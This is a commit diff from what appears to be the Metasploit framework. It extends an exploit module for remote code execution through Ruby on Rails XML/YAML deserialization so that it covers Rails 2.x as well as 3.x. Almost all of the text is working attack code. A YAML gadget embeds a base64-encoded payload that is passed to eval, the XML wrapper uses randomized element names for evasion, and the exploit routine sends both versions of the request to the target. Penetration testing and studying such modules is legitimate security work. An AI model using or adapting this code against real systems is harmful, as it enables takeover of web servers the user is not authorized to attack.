Merge in Rails2 support now that its in master

2013-01-10 02:14:08 -06:00 · 2013-01-10 02:14:08 -06:00 · 42ea64c21b
parent bf013ba65f
commit 42ea64c21b
1 changed files with 34 additions and 9 deletions
--- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				an attacker to instantiate a remote object, which in turn can be used to execute
 				any ruby code remotely in the context of the application.

-				This module has been tested across multiple versions of RoR 3.x, but does not yet
-				work against 2.x versions of RoR.
-
+				This module has been tested across multiple versions of RoR 3.x and RoR 2.x
 			},
 			'Author'         =>
 				[
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	# Create the YAML document that will be embedded into the XML
 	#
-	def build_yaml
+	def build_yaml_rails2
+
+		# Embed the payload with the detached stub
+		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+		yaml =
+			"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
+			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
+			"eval(%[#{code}].unpack(%[m0])[0]);' " +
+			": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n   " +
+			":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n     :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
+			":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
+		yaml
+	end
+
+
+	#
+	# Create the YAML document that will be embedded into the XML
+	#
+	def build_yaml_rails3

 		# Embed the payload with the detached stub
 		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	# Create the XML wrapper with any desired evasion
 	#
-	def build_request
+	def build_request(v)
 		xml = ''

 		elo = Rex::Text.rand_text_alpha(rand(12)+4)
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		el = Rex::Text.rand_text_alpha(rand(12)+4)
 		xml << "<#{el} type='yaml'>"
-		xml << build_yaml
+		xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
 		xml << "</#{el}>"

 		if datastore['XML::PadElement']
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
 	# Send the actual request
 	#
 	def exploit
-		data = build_request
-		print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
+
+		print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
 		res = send_request_cgi({
 			'uri'    => datastore['URIPATH'] || "/",
 			'method' => datastore['HTTP_METHOD'],
 			'ctype'  => 'application/xml',
-			'data'   => data,
+			'data'   => build_request(3)
+		}, 25)
+		handler
+
+		print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
+		res = send_request_cgi({
+			'uri'    => datastore['URIPATH'] || "/",
+			'method' => datastore['HTTP_METHOD'],
+			'ctype'  => 'application/xml',
+			'data'   => build_request(2)
 		}, 25)
 		handler
 	end